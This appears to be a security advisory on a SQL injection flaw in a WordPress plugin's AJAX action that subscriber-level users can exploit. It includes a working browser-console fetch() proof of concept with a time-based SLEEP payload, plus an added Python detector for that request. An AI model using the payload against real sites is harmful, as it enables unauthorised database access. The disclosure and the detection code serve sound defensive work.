The plugin does not escape some parameters before using them in various SQL statements used by AJAX actions available to any authenticated user, leading to a SQL injection exploitable by low-privilege users such as subscribers.
Run the command below in the developer console of the web browser while on the blog as a subscriber user, and notice the 5s delay before the response is received:

    fetch("/wp-admin/admin-ajax.php", {
      "headers": {
        "content-type": "application/x-www-form-urlencoded",
      },
      "method": "POST",
      "body": 'action=lasso_lite_group_get_list&page=1&keyword=v%27%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F9434%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%285%29%29%29kcCp%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27oJFG%27%3D%27oJFG',
      "credentials": "include"
    }).then(response => response.text())
      .then(data => console.log(data));
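A defender-side check for the request above, as an added example that is not part of the original advisory or the plugin's code: it decodes a captured form-encoded POST body and flags the traits this payload shows in the `keyword` parameter. The function name, the heuristics, the two-signal threshold and the benign sample body are assumptions of this example, not a complete detection rule.

```python
import re
from urllib.parse import parse_qs

# Action and parameter named in the advisory's proof of concept.
ACTION = "lasso_lite_group_get_list"
PARAM = "keyword"

# Heuristics chosen for this example (assumptions, not an exhaustive rule set).
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)
SUBQUERY = re.compile(r"\(\s*select\b", re.I)
TIME_FUNCS = re.compile(r"\b(sleep|benchmark)\s*\(", re.I)

# Request body copied from the advisory's proof of concept.
POC_BODY = (
    "action=lasso_lite_group_get_list&page=1&keyword=v%27%2F%2A%2A%2FAND"
    "%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F9434%2F%2A%2A%2FFROM%2F%2A%2A%2F%28"
    "SELECT%28SLEEP%285%29%29%29kcCp%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27oJFG"
    "%27%3D%27oJFG"
)
# Constructed benign search containing an apostrophe.
BENIGN_BODY = "action=lasso_lite_group_get_list&page=1&keyword=women%27s+shoes"


def inspect_body(body: str) -> dict:
    """Decode an admin-ajax.php POST body and flag SQL injection traits."""
    fields = parse_qs(body, keep_blank_values=True)
    action = fields.get("action", [""])[0]
    raw = fields.get(PARAM, [""])[0]
    # /**/ stands in for whitespace in the payload; normalise before matching.
    decoded = INLINE_COMMENT.sub(" ", raw)
    reasons = []
    if "'" in raw:
        reasons.append("quote")
    if INLINE_COMMENT.search(raw):
        reasons.append("inline-comment")
    if SUBQUERY.search(decoded):
        reasons.append("subquery")
    if TIME_FUNCS.search(decoded):
        reasons.append("time-delay")
    # One signal alone (e.g. an apostrophe) is common in real searches.
    suspicious = action == ACTION and len(reasons) >= 2
    return {"decoded": decoded, "reasons": reasons, "suspicious": suspicious}


if __name__ == "__main__":
    for name, body in (("poc", POC_BODY), ("benign", BENIGN_BODY)):
        print(name, inspect_body(body))
```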
2023-01-17 (about 4 months ago)